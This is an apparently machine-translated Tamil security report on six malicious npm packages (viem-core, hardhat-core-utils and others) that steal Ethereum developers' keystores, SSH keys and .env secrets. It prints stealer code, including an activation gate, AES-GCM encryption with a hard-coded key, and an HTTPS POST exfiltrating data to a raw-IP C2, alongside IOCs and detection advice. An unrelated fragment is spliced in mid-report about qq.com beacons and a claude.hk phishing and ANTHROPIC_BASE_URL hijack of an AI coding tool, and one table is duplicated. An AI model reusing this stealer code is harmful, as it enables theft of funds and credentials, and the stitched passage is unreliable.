டிஎல்; DR
மே 6, 2026 அன்று, ஒரு தனிப்பட்ட npm பப்ளிஷர், namikazesarada010206Ethereum, Solidity மற்றும் DeFi டெவலப்பர் சூழலமைப்பைக் குறிவைத்து ஆறு தீங்கிழைக்கும் தொகுப்புகள் பரப்பப்பட்டன.
அந்தப் பொட்டலங்கள், viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, மற்றும் web3-utils-coreபிரபலமான Web3 கருவிகளுக்கான உதவி நூலகங்களைப் போல் தோற்றமளிக்கும் வகையில், நம்பத்தகுந்த பெயர்கள் பயன்படுத்தப்பட்டன.
ஆறு பொட்டலங்களிலும் ஒரே மாதிரியானவை இருந்தன. telemetry.js கோப்பு. அந்தக் கோப்பு கிளஸ்டர் முழுவதும் பைட் அளவில் ஒரே மாதிரியாக இருந்தது, அதன் SHA-256:
தீம்பொருள் நிறுவப்படும் நேரத்தில் செயல்படுவதில்லை. அங்கு எதுவும் இல்லை. preinstall or postinstall அதற்குப் பதிலாக, தொகுப்பு இறக்குமதி செய்யப்படும்போது இது செயல்படுத்தப்படுகிறது. require().
அந்த விவரம் முக்கியமானது.
ஒரு டெவலப்பர் அந்தத் தொகுப்பை உண்மையில் பயன்படுத்தும் வரை இந்த இம்ப்ளான்ட் காத்திருக்கும். பின்னர், அந்தப் பணிநிலையம் ஒரு உண்மையான Ethereum / Solidity மேம்பாட்டுச் சூழலைப் போல் உள்ளதா என்பதை அது சரிபார்க்கிறது. அது Alchemy அல்லது Infura சாவிகள், தனிப்பட்ட சாவிகள், நினைவூட்டல் குறியீடுகள், டிப்ளாயர் சாவிகள் அல்லது ஒரு உள்ளூர் Foundry கோப்பகம் ஆகியவற்றைத் தேடுகிறது.
ஹோஸ்ட் பொருந்தினால், திருடன் SSH பிரைவேட் கீகள், Foundry / Geth / Brownie வாலட் கீஸ்டோர்கள் ஆகியவற்றைச் சேகரிக்கிறான். .env* கோப்புகள் மற்றும் முக்கியமான சூழல் மாறிகள். இது, நிரலில் நேரடியாக இடப்பட்ட கடவுச்சொல்லைப் பயன்படுத்தி AES-256-GCM மூலம் அந்தக் கோப்புத் தொகுப்பைக் குறியாக்கம் செய்து, TLS சரிபார்ப்பு முடக்கப்பட்ட ஒரு மூல IPv4 C2 முனையத்திற்கு அதை வெளியேற்றுகிறது.
சைஜெனி-யின் தீம்பொருள் முன்கூட்டிய எச்சரிக்கை (MEW) அமைப்பு, ஆறு தொகுப்புகளையும் தீங்கிழைப்பவை என உறுதிப்படுத்தியுள்ளது. npm ரெஜிஸ்ட்ரி நீக்க அறிக்கை தொகுப்பு நிலுவையில் உள்ளது.
கிளஸ்டர்: ஆறு தொகுப்புகள், ஒரே பதிப்பாளர்
பதிப்பாளர் கணக்கு namikazesarada010206 சரிபார்க்கப்படாத ஜிமெயில் முகவரியுடன் இணைக்கப்பட்டிருந்தது namikazesarada010206@gmail.com.
இந்தப் பிரச்சாரம் மே 6, 2026 அன்று ஒரே நாள் வெளியீடாக வெளிவந்தது. ஆறு தொகுப்புகளும் பின்வருமாறு பதிப்பிக்கப்பட்டன: 1.0.0, பூஜ்ஜிய இயக்க நேரச் சார்புகளைக் கொண்டிருந்தது, மற்றும் மூன்று கோப்புகளை மட்டுமே அனுப்பியது:
package.json index.js telemetry.js அவர்களும் அதே மூலக் களஞ்சியத்தை அறிவித்தனர்:
https://github.com/harunosakura030303-maker/evmchain-config முதல் மூன்று தொகுப்புகளும் முதல் வெளியீட்டின்போதே MEW ஸ்கேனர்களால் கண்டறியப்பட்டன. மீதமுள்ள மூன்றும், வெளியீட்டாளரின் npm சுயவிவரத்தை ஆய்வாளர் ஆய்வு செய்த பிறகு வலுக்கட்டாயமாகக் கொடியிடப்பட்டன. ஒரே பைட்-ஒரே மாதிரியான telemetry.js கிளஸ்டர் முழுவதும் உறுதிப்படுத்தப்பட்டதால், அவை சீரான தன்மையின் அடிப்படையில் தீங்கிழைக்கும் தன்மையுடையவை எனக் கருதப்பட்டு மூடப்பட்டன.
| தொகுப்பு | பதிப்பு | npm வெளியிடப்பட்டது | MEW டிக்கெட் | தீர்ப்பு |
|---|---|---|---|---|
| வியெம்-கோர் | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | தீங்கிழைக்கும் |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | தீங்கிழைக்கும் |
| ஹார்ட்ஹாட்-கோர்-யூடில்ஸ் | 1.0.0 | 2026-05-06 | #51051 | தீங்கிழைக்கும் |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | நிலைத்தன்மையால் தீங்கிழைக்கும் |
| வார்ப்பு-பயன்பாடுகள் | 1.0.0 | 2026-05-06 | #51071 | நிலைத்தன்மையால் தீங்கிழைக்கும் |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | நிலைத்தன்மையால் தீங்கிழைக்கும் |
பெயரிடும் உத்தி எளிமையானது ஆனால் பயனுள்ளது.
இந்தத் தொகுப்புகள் மூலத்தின் சரியான பெயர்களைப் போல ஆள்மாறாட்டம் செய்வதில்லை. மாறாக, அவை பின்வரும் நம்பத்தகுந்த "பயன்பாட்டு" பின்னொட்டுகளைப் பயன்படுத்துகின்றன: -core, -utils, மற்றும் -utils-coreஅது, Web3 கருவிகளுக்கு அருகில் ஒரு டெவலப்பர் காண எதிர்பார்க்கக்கூடிய துணை நூலகங்களைப் போல அவற்றைக் காட்டுகிறது.
| தீங்கிழைக்கும் தொகுப்பு | சட்டபூர்வமான இலக்கு |
|---|---|
| வியெம்-கோர் | viem, ஒரு பிரபலமான Ethereum TypeScript கிளையன்ட் |
| viem-utils-core | வியெம் |
| ஹார்ட்ஹாட்-கோர்-யூடில்ஸ் | ஹார்ட்ஹாட், ஒரு பிரதான சாலிடிட்டி மேம்பாட்டுச் சூழல் |
| evm-utils | பொதுவான EVM கருவி பெயர்வெளி |
| வார்ப்பு-பயன்பாடுகள் | ஃபவுண்டரி, ஒரு சாலிடிட்டி கருவித் தொடர் |
| web3-utils-core | web3-utils, Web3.js உதவியாளர்கள் |
இதுதான் “துணைத் தொகுப்பு” பாணி: அதாவது, “நான்தான் உண்மையான தொகுப்பு” என்பதல்ல, மாறாக “அந்த உண்மையான தொகுப்பைச் சுற்றி நான் ஒரு தகுந்த உதவியாளராகத் தெரிகிறேன்” என்பதே.
வேகமாகச் செயல்படும் DeFi உருவாக்குநர்களுக்கு, அதுவே ஆபத்தை உருவாக்கப் போதுமானது.
பொதி இறக்குமதி செய்யப்படும்போது என்ன நடக்கும்
இந்தத் தாக்குதல் சங்கிலி சிறியதாகவும், திட்டமிட்டதாகவும், கிரிப்டோ மேம்பாட்டுச் சூழல்களைக் குறிவைப்பதாகவும் உள்ளது.
நிறுவல் இணைப்பு எதுவும் இல்லை. அதற்குப் பதிலாக, ஒவ்வொரு தொகுப்பும் ஒரு index.js அது ஸ்டப் செயல்பாட்டை ஏற்றுமதி செய்துவிட்டு, பின்னர் தீங்கிழைக்கும் டெலிமெட்ரி தொகுதியை ஏற்றுகிறது.
require('./telemetry').init(); இதன் பொருள், தீம்பொருள் முதல் முறையாக இறக்குமதி செய்யப்படும்போதே செயல்படத் தொடங்குகிறது.
அது தாக்குபவருக்கு செயல்பாட்டு ரீதியாகப் பயனுள்ளது. பல ஸ்கேனர்களும் சாண்ட்பாக்ஸ்களும் நிறுவும் நேரச் செயல்பாடுகளில் கவனம் செலுத்துகின்றன. இந்தத் தொகுப்பு, ஒரு டெவலப்பர், பில்ட் ஸ்கிரிப்ட், சோதனைத் தொகுப்பு அல்லது ரன்டைம் பாதையால் உண்மையில் பயன்படுத்தப்படும் வரை காத்திருக்கிறது.
செயல்படுத்தும் வாயில்: உண்மையான Web3 டெவலப்பர் பணிநிலையங்களில் மட்டுமே செயல்படும்
உள்வைப்பின் மிக முக்கியமான பகுதி செயல்படுத்தும் வாயில் ஆகும்.
இந்த தீம்பொருள், Ethereum / Solidity டெவலப்பர் கணினிகளில் பொதுவாகக் காணப்படும் சூழல் மாறிகளைச் சரிபார்க்கிறது:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); ஃபவுன்ட்ரி நிறுவப்பட்டுள்ளதா என்பதையும் இது சரிபார்க்கிறது:
fs.existsSync(path.join(os.homedir(), '.foundry')) இரண்டு நிபந்தனைகளும் உண்மையாக இல்லாவிட்டால், செயல்பாடு திரும்பி வந்து எதுவும் செய்யாது.
இது பொதுவான பகுப்பாய்வுச் சூழல்களில் தொகுப்பை அமைதியாக்குகிறது. Foundry, Alchemy சாவிகள், Infura சாவிகள், தனிப்பட்ட சாவிகள் அல்லது நினைவூட்டல்கள் இல்லாத ஒரு சோதனைக் களத்தில், பாதிப்பில்லாதது போல் தோற்றமளிக்கும் ஒரு இறக்குமதியைக் காணக்கூடும்.
பொருத்தமான ஹோஸ்டில், தீம்பொருள் தரவுகளைச் சேகரிப்பதற்கு முன் 60 முதல் 90 வினாடிகள் வரை காத்திருக்கும்:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); இந்தத் தாமதம், இறக்குமதிக்கும் வெளியேற்றத்திற்கும் இடையிலான வெளிப்படையான தொடர்பைக் குறைக்கிறது. .unref() ஒரு தொகுப்பு குறுகிய கால ஸ்கிரிப்ட்டில் இறக்குமதி செய்யப்பட்டிருந்தால், இந்த அழைப்பு ஹோஸ்ட் செயல்முறையை சாதாரணமாக வெளியேறவும் அனுமதிக்கிறது.
இது ஆரவாரம் செய்து திடீரெனக் கொள்ளையடிக்கும் செயல்பாடு அல்ல. டெவலப்பர் சூழலிலிருந்து திருடுவது மதிப்புள்ளதாக இருந்தால் தவிர, இயங்குவதைத் தவிர்ப்பதற்காக வடிவமைக்கப்பட்ட ஒரு இலக்கு வைக்கப்பட்ட திருடன் இது.
திருடன் சேகரிப்பவை
செயல்படுத்தும் தடையைக் கடந்தவுடன், அந்த தீம்பொருள் Web3 உருவாக்கத்தில் மிகவும் முக்கியமான ஆதாரங்களான தனிப்பட்ட சாவிகள், வாலட் கீஸ்டோர்கள், வரிசைப்படுத்தல் நற்சான்றிதழ்கள், கிளவுட் இரகசியங்கள், npm டோக்கன்கள் மற்றும் உள்ளூர் திட்ட உள்ளமைவு ஆகியவற்றிலிருந்து தரவுகளைச் சேகரிக்கிறது.
| மூல | என்ன சேகரிக்கப்படுகிறது |
|---|---|
| செயல்முறை.என்வி | /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i உடன் பொருந்தும் எந்தவொரு மாறியும் |
| ~/.ssh/* | PRIVATE KEY அல்லது BEGIN OPENSSH என்ற சொற்களைக் கொண்ட கோப்புகள், முழு கோப்பு உள்ளடக்கம் உட்பட. |
| ~/.foundry/keystores/* | ஃபவுண்டரி வாலட் கீஸ்டோர் கோப்புகள் |
| ~/.ethereum/keystore/* | கெத் வாலட் கீஸ்டோர் கோப்புகள் |
| ~/.brownie/accounts/* | பிரவுனி வாலட் கீஸ்டோர் கோப்புகள் |
| ${cwd}/.env | முழு கோப்பு உள்ளடக்கம் |
| ${cwd}/.env.local | முழு கோப்பு உள்ளடக்கம் |
| ${cwd}/.env.production | முழு கோப்பு உள்ளடக்கம் |
| ${cwd}/.env.development | முழு கோப்பு உள்ளடக்கம் |
| os.hostname() | ஹோஸ்ட் மெட்டாடேட்டா |
| crypto.randomUUID() | பாதிக்கப்பட்டவர்/அமர்வு அடையாளங்காட்டி |
| தேதி.இப்போது() | சேகரிப்பு நேரமுத்திரை |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ATTA டோக்கன்கள் பின்வருமாறு:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 அந்த டெலிமெட்ரி, ஆபரேட்டரின் சொந்தப் பகுப்பாய்வா அல்லது தனியாக வருமானம் ஈட்டப்பட்ட ஒரு சேனலா என்பதை எங்களால் உறுதிப்படுத்த முடியவில்லை. நாங்கள் ஆய்வு செய்த இரண்டு மாதிரிகளிலும் ATTA டோக்கன்கள் ஒரே மாதிரியாக உள்ளன.
கிளஸ்டர் B: ஹெய்பாய்
claude.hk OAuth ஃபிஷிங் + ANTHROPIC_BASE_URL ஹைஜாக்
ஏப்ரல் 1 ஆம் தேதி மாதிரி என்பது பிரச்சாரத்தின் கச்சாத்தனமான, முற்காலப் பகுதியாகும்.
heibai:2.1.88-claude.hk-4 மூலம் வெளியிடப்பட்டது wuguoqiangvip28ஜூன் 7, 2025 அன்று உருவாக்கப்பட்ட ஒரு கணக்கு. அந்தத் தொகுப்பு, முறையான பதிப்பிற்கு எதிராகத் தன்னைத் தானே வெளிப்படையாகப் பதிப்பித்துக் கொண்டது. 2.1.88 மானுட வெளியீடு.
இது CA-cert MITM-ஐப் பொருட்படுத்துவதில்லை. மாறாக, OAuth எண்ட்பாயிண்ட் குறித்து பயனரிடம் பொய் சொல்கிறது.
கசிந்த கிளாட் கோட் மூலக் குறியீட்டின் மீது சேர்க்கப்பட்டுள்ள தீங்கிழைக்கும் அம்சங்கள் பின்வருமாறு:
| மூல | என்ன சேகரிக்கப்படுகிறது |
|---|---|
| செயல்முறை.என்வி | /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i உடன் பொருந்தும் எந்தவொரு மாறியும் |
| ~/.ssh/* | PRIVATE KEY அல்லது BEGIN OPENSSH என்ற சொற்களைக் கொண்ட கோப்புகள், முழு கோப்பு உள்ளடக்கம் உட்பட. |
| ~/.foundry/keystores/* | ஃபவுண்டரி வாலட் கீஸ்டோர் கோப்புகள் |
| ~/.ethereum/keystore/* | கெத் வாலட் கீஸ்டோர் கோப்புகள் |
| ~/.brownie/accounts/* | பிரவுனி வாலட் கீஸ்டோர் கோப்புகள் |
| ${cwd}/.env | முழு கோப்பு உள்ளடக்கம் |
| ${cwd}/.env.local | முழு கோப்பு உள்ளடக்கம் |
| ${cwd}/.env.production | முழு கோப்பு உள்ளடக்கம் |
| ${cwd}/.env.development | முழு கோப்பு உள்ளடக்கம் |
| os.hostname() | ஹோஸ்ட் மெட்டாடேட்டா |
| crypto.randomUUID() | பாதிக்கப்பட்டவர்/அமர்வு அடையாளங்காட்டி |
| தேதி.இப்போது() | சேகரிப்பு நேரமுத்திரை |
இலக்குப் பட்டியல் மிகவும் குறிப்பிட்டது. இது பொதுவான உலாவித் திருட்டோ அல்லது பரந்த நற்சான்றிதழ் சுரண்டலோ அல்ல. இது எத்தேரியம் பயன்பாடுகளை உருவாக்கும், சோதிக்கும், செயல்படுத்தும் அல்லது இயக்கும் டெவலப்பர்களை இலக்காகக் கொண்டது.
Foundry, Geth, மற்றும் Brownie கீஸ்டோர்களின் உள்ளடக்கமானது குறிப்பாக முக்கியமானது. இந்தக் கோப்புகள் வாலெட்டுகள் அல்லது டிப்ளாய்மென்ட் அடையாளங்களுக்கான நேரடி அணுகலை வழங்கக்கூடும். தாக்குபவர் அவற்றை கடவுச்சொற்கள், நினைவூட்டல் குறியீடுகள் அல்லது சூழல் இரகசியங்களுடன் இணைக்க முடிந்தால், அவர்களால் நிதியை நகர்த்தவோ, டிப்ளாய் செய்பவர்களைப் போல் ஆள்மாறாட்டம் செய்யவோ, அல்லது ஸ்மார்ட் கான்ட்ராக்ட் செயல்பாடுகளைச் சீர்குலைக்கவோ முடியும்.
தரவு கசிவுக்கு முன் குறியாக்கம்
அந்த தீம்பொருள், சேகரிக்கப்பட்ட தரவுகளை அனுப்புவதற்கு முன்பு குறியாக்கம் செய்கிறது.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); நிரலில் நேரடியாகப் பதியப்பட்ட கடவுச்சொல்:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d இறுதித் தரவு JSON வடிவத்தில் தொகுக்கப்பட்டுள்ளது:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} குறியாக்கம் மட்டுமே தீம்பொருளை மேலும் மேம்பட்டதாக மாற்றுவதில்லை. இருப்பினும், அது பிணைய ஆய்வைக் கடினமாக்குகிறது. வெளியேறும் தரவைக் கண்காணிக்கும் ஒரு பாதுகாப்பு அமைப்பு, ஒரு JSON தரவுப் பொதியைக் காணும், ஆனால் திருடப்பட்ட சாவிகள், பணப்பை கோப்புகள் அல்லது வேறு எதையும் காணாது. .env நிரலில் நேரடியாக இடப்பட்ட கடவுச்சொல் மற்றும் மறைகுறியாக்கத் தர்க்கம் இல்லாத உள்ளடக்கங்கள்.
மூல IPv4 C2 க்கு தரவு கசிவு
கசிவுப் பாதை நிரலில் நேரடியாகக் குறிப்பிடப்பட்டுள்ளது:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); தீம்பொருள் பின்வரும் இடத்திற்குத் தரவை அனுப்புகிறது:
https://76.13.37.80:8443/api/v1/telemetry இரண்டு விவரங்கள் தனித்துத் தெரிகின்றன.
முதலில், C2 என்பது ஒரு டொமைனுக்குப் பதிலாக ஒரு மூல IPv4 முகவரியாகும். அது டொமைன் பதிவின் தேவையை நீக்குவதோடு, டொமைன் அடிப்படையிலான சில கண்டறிதல்களையும் தவிர்க்கிறது.
இரண்டாவதாக, TLS சரிபார்ப்பு பின்வருவனவற்றால் முடக்கப்பட்டுள்ளது:
rejectUnauthorized: false அது, சுயமாக கையொப்பமிடப்பட்ட சான்றிதழ்கள் உட்பட எந்தவொரு சான்றிதழையும் தீம்பொருள் ஏற்றுக்கொள்ள அனுமதிக்கிறது. வேறுவிதமாகக் கூறினால், தாக்குபவர் செல்லுபடியாகும் பொதுச் சான்றிதழ் தேவையின்றி மறைகுறியாக்கப்பட்ட தரவுப் பரிமாற்றத்தைப் பெறுகிறார்.
மீண்டும் முயற்சிக்கும் தர்க்கமோ அல்லது மாற்று ஹோஸ்டோ இல்லை. பிழைகள் சத்தமின்றி மறைக்கப்படுகின்றன. C2 ஆஃப்லைனில் இருந்தாலோ அல்லது அணுக முடியாத நிலையில் இருந்தாலோ, இது தொகுப்பை அமைதியாக வைத்திருக்கிறது.
இந்த பிரச்சாரம் ஏன் முக்கியமானது?
டெவலப்பர்களை இலக்காகக் கொண்ட பெரும்பாலான தீங்கிழைக்கும் npm தொகுப்புகள், npm டோக்கன்கள், AWS கீகள், GitHub டோக்கன்கள் போன்ற பரந்த சான்றுகளைப் பின்தொடர்கின்றன. .npmrc கோப்புகளை.
இந்தப் பிரச்சாரம் இலக்கைச் சுருக்குகிறது.
அந்த இயந்திரம் ஒரு எத்தேரியம் அல்லது சாலிடிட்டி டெவலப்பருக்குச் சொந்தமானது என்பதற்கான அறிகுறிகளை இது தேடுகிறது. பின்னர், அந்தச் சூழலுக்கு முக்கியமான சொத்துக்களை இது துல்லியமாகப் பிரித்தெடுக்கிறது: வாலட் கீஸ்டோர்கள், பிரைவேட் கீகள், மனிமோனிக்ஸ், டிப்ளாயர் கீகள். .env கோப்புகள் மற்றும் SSH திறவிகள்.
அது, ஒரு சாதாரண npm ஸ்டீலரை விட, Web3 குழுக்களுக்கு அந்தப் பிரச்சாரத்தை மிகவும் ஆபத்தானதாக ஆக்குகிறது.
ஒரு வெற்றிகரமான தொற்று பின்வருவனவற்றை வெளிப்படுத்தக்கூடும்:
- வரிசைப்படுத்தல் பணப்பைகள்
- ஸ்மார்ட் ஒப்பந்த நிர்வாகி விசைகள்
- RPC வழங்குநர் விசைகள்
- கிளவுட் வரிசைப்படுத்தல் நற்சான்றிதழ்கள்
- npm வெளியீட்டு டோக்கன்கள்
- டெவலப்பர் அல்லது பில்ட் உள்கட்டமைப்பிற்கான SSH அணுகல்
- திட்ட இரகசியங்கள் சேமிக்கப்பட்டுள்ளன
.envகோப்புகளை - Foundry, Geth, அல்லது Brownie-க்கான வாலட் கீஸ்டோர்கள்
இந்தத் தொகுப்புப் பெயர்கள் தெளிவான சமூகப் பொறியியலையும் காட்டுகின்றன. அவை, நன்கு அறிமுகமான கருவிப் பெயர்கள் மூலம் Web3 உருவாக்குநர் சூழலைக் குறிவைக்கின்றன: viem, hardhat, foundry, evm, மற்றும் web3.
நடிகர் உண்மையான திட்டங்களில் சமரசம் செய்துகொள்ளத் தேவையில்லை. நியாயமானதாகத் தோன்றும் ஒரு துணைத் தொகுப்பை நிறுவுவதற்கு ஒரு டெவலப்பர் மட்டும் அவர்களுக்குத் தேவை.
சமரச மற்றும் கண்டறிதல் குறிகாட்டிகள்
| தொகுப்புகள் மற்றும் வெளியீட்டாளர் | |
|---|---|
| களம் | மதிப்பு |
| npm வெளியீட்டாளர் | namikazesarada010206 |
| பதிப்பாளர் மின்னஞ்சல் | namikazesarada010206@gmail.com |
| மின்னஞ்சல் சரிபார்க்கப்பட்டது | இல்லை |
| SCM சரிபார்க்கப்பட்டது | இல்லை |
| நற்பெயர் மதிப்பெண் | 1.0 |
| தொகுப்புகள் | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, Foundry-utils, web3-utils-core |
| பதிப்புகள் | அனைத்து 1.0.0 |
| மூலக் களஞ்சியம் | https://github.com/harunosakura030303-maker/evmchain-config |
| தீங்கிழைக்கும் என உறுதிப்படுத்தப்பட்டது | ஆறு தொகுப்புகளும் |
| பிணையம் | |
|---|---|
| வகை | மதிப்பு |
| C2 முனை | https://76.13.37.80:8443/api/v1/telemetry |
| சி2 ஐபி | 76.13.37.80 |
| C2 போர்ட் | 8443/டிசிபி |
| TLS நடத்தை | அங்கீகரிக்கப்படாததை நிராகரி: தவறு |
| பேலோட் ஸ்கீமா | {"v":2,"iv": "d": "t": } |
| கோப்புகள் மற்றும் ஹாஷ்கள் | |
|---|---|
| வகை | மதிப்பு |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| தொகுப்பு தளவமைப்பு | package.json, index.js, telemetry.js |
| கோப்பு எண்ணிக்கை | 3 |
| தோராயமான மொத்த அளவு | 3.4 கே.பி. |
செயல்படுத்தும் சமிக்ஞைகள்
தீம்பொருள் பின்வரும் சூழல் மாறிகளைச் சரிபார்க்கிறது:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY இது பின்வருவனவற்றையும் சரிபார்க்கிறது:
~/.foundry/ இலக்கு ஹோஸ்ட் பாதைகள்
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development சேகரிப்பு ரெஜெக்ஸ்
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i கண்டறிதல் குறிப்புகள்
முழுமையான நடத்தைப் பகுப்பாய்வு தேவையின்றி, பல விதிகள் இந்த பிரச்சாரத்தைக் கண்டறிந்துவிடுகின்றன.
முதலில், ஆறு தீங்கிழைக்கும் தொகுப்புப் பெயர்களுக்காக லாக்ஃபைல்களை ஸ்கேன் செய்யவும்:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core எந்தவொரு போட்டியிலும் package-lock.json, yarn.lock, pnpm-lock.yaml, அல்லது node_modules வரலாற்றை ஒரு தீவிரமான சம்பவமாகக் கருத வேண்டும்.
இரண்டாவதாக, Node.js செயல்முறைகள் வாலட் கீஸ்டோர் பாதைகளைப் படிக்கின்றனவா என்பதைக் கண்காணிக்கவும்:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ துணைச் சார்புநிலையாக இறக்குமதி செய்யப்பட்ட ஒரு தொகுப்பிற்கு, இது அரிதாகவே முறையான செயல்பாடாகும். இதைத் தொடர்ந்து வெளிச்செல்லும் பிணையச் செயல்பாடு நிகழும்போது இது குறிப்பாகச் சந்தேகத்திற்குரியதாகிறது.
மூன்றாவதாக, HTTPS இணைப்புகளைத் தடுக்கவும் அல்லது எச்சரிக்கவும்:
76.13.37.80:8443 குறிப்பாக கோரிக்கை பாதை இதுவாக இருக்கும்போது:
/api/v1/telemetry நான்காவதாக, இந்தப் பண்புகளை ஒருங்கிணைக்கும் npm தொகுப்புகளைத் தேடுங்கள்:
- புதிய அல்லது குறைந்த நற்பெயர் கொண்ட பதிப்பாளர்
- சரிபார்க்கப்படாத ஜிமெயில் கணக்கு
- Web3-சார்ந்த தொகுப்பின் பெயர்
- அர்த்தமுள்ள களஞ்சிய வரலாறு இல்லை
- சிறிய தொகுப்பு தளவமைப்பு
index.jsடெலிமெட்ரி அல்லது துணை கோப்பை ஏற்றுகிறது- இயக்க நேரச் சார்புகள் இல்லை
- உணர்திறன் மிக்க சூழல்-மாறக்கூடிய சேகரிப்பு
- வாலட் கீஸ்டோர் அணுகல்
ஒற்றை IOC-ஐ விட இந்த முறை மிகவும் பயனுள்ளது, ஏனெனில் அடுத்த தொகுப்பு IP முகவரியை மாற்றக்கூடும், ஆனால் அதே இலக்கு நிர்ணய தர்க்கத்தைத் தக்க வைத்துக் கொள்ளும்.
சமரச பதில் சரிபார்ப்புப் பட்டியல்
ஒரு டெவலப்பர் ஆறு தொகுப்புகளில் ஒன்றைப் பயன்படுத்தி, அவரது சூழல் செயல்படுத்தும் வாயிலுடன் பொருந்தினால், அந்தப் பணிநிலையத்தைப் பாதிப்புக்குள்ளானதாகக் கருதவும்.
அதில், Foundry நிறுவப்பட்ட கணினிகள், சூழலில் உள்ள Alchemy அல்லது Infura சாவிகள், தனிப்பட்ட சாவிகள், நினைவூட்டல் குறியீடுகள் அல்லது நிலைநிறுத்திச் சாவிகள் ஆகியவை அடங்கும்.
பரிந்துரைக்கப்பட்ட பதில்:
- ஹோஸ்டை நெட்வொர்க்கிலிருந்து துண்டிக்கவும்.
- பாதுகாப்பகம்
node_modulesலாக்ஃபைல்கள், ஷெல் வரலாறு மற்றும் தடயவியல் ஆய்விற்கான தொடர்புடைய பதிவுகள். - கீழ் உள்ள ஒவ்வொரு SSH விசை இணையையும் சுழற்றுங்கள்
~/.ssh/. - ஒவ்வொரு கீஸ்டோருக்கும் வாலட் சாவிகளை சுழற்றுங்கள்
~/.foundry,~/.ethereum, மற்றும்~/.brownie. - நிதியை புதிய வாலெட்டுகளுக்கு மாற்றவும்.
- சேமிக்கப்பட்டுள்ள ஒவ்வொரு ரகசியத்தையும் சுழற்றுங்கள்
.env*டெவலப்பர் பணியாற்றிய களஞ்சியங்களில் உள்ள கோப்புகள். - AWS கீகள், npm டோக்கன்கள், டிப்ளாய் டோக்கன்கள், API கீகள், பிரைவேட் கீகள், சீட்கள் மற்றும் ம்னிமோனிக்ஸ் உள்ளிட்ட, கலெக்ஷன் ரெஜெக்ஸுடன் பொருந்தும் என்விரான்மென்ட் சீக்ரெட்களை சுழற்சி செய்யவும்.
- இந்தத் தொகுப்பு முதன்முதலில் நிறுவப்பட்டதிலிருந்து கிளவுட், என்பிஎம், கிட்ஹப், ஆர்பிசி வழங்குநர் மற்றும் பிளாக்செயின் செயல்பாடுகளைத் தணிக்கை செய்யுங்கள்.
- மீண்டும் பயன்படுத்துவதற்கு முன் பணிநிலையத்தை மறுபடியும் பிம்பமாக்குங்கள்.
பாதுகாவலர்கள் எடுத்துக்கொள்ள வேண்டியவை
உயர் மதிப்புள்ள டெவலப்பர் சூழல்களில் npm டைப்போஸ்க்வாட்டிங் எவ்வாறு உருவாகி வருகிறது என்பதை இந்தப் பிரச்சாரம் காட்டுகிறது.
அந்த நடிகருக்கு விடாமுயற்சி தேவைப்படவில்லை. அவர்களுக்குக் குழப்பம் தேவைப்படவில்லை. அவர்களுக்கு நிறுவல் நேரச் செயலாக்கம் கூடத் தேவைப்படவில்லை.
அதற்குப் பதிலாக, அவர்கள் மூன்று விஷயங்களைச் சார்ந்திருந்தனர்:
- சாத்தியமான Web3 தொகுப்புப் பெயர்கள்
- உண்மையான கிரிப்டோ-டெவலப்மெண்ட் இயந்திரங்களில் மட்டுமே செயல்படுத்த முடியும்
- எத்தேரியம் டெவலப்பர்களுக்கு மிகவும் முக்கியமான கோப்புகள் மற்றும் இரகசியங்களை நேரடியாகத் திருடுதல்
அதனால், மேலோட்டமாகப் பார்க்கும்போது அந்தப் பிரச்சாரத்தைக் கண்டுகொள்ளாமல் விடுவது எளிது; மேலும், அது சரியான சூழலில் வெளிப்படும்போது ஆபத்தானதாகவும் அமைகிறது.
Web3 குழுக்களுக்கான பாடம் தெளிவாக உள்ளது: சார்புநிலைகளின் பெயர்களை உங்கள் அச்சுறுத்தல் மாதிரியின் ஒரு பகுதியாகக் கருதுங்கள். பாதிப்பில்லாத உதவியாளர் போலத் தோற்றமளிக்கும் ஒரு தொகுப்பு கூட, பண இழப்பை ஏற்படுத்தும் மிகக் குறுகிய பாதையாக மாறக்கூடும்.
npm ரெஜிஸ்ட்ரியில் புகாரளிக்கப்பட்டுள்ளது. பப்ளிஷர் கணக்கு மற்றும் பேக்கேஜ்கள் அகற்றப்பட்டதும், இந்தப் பதிவைப் புதுப்பிப்போம்.




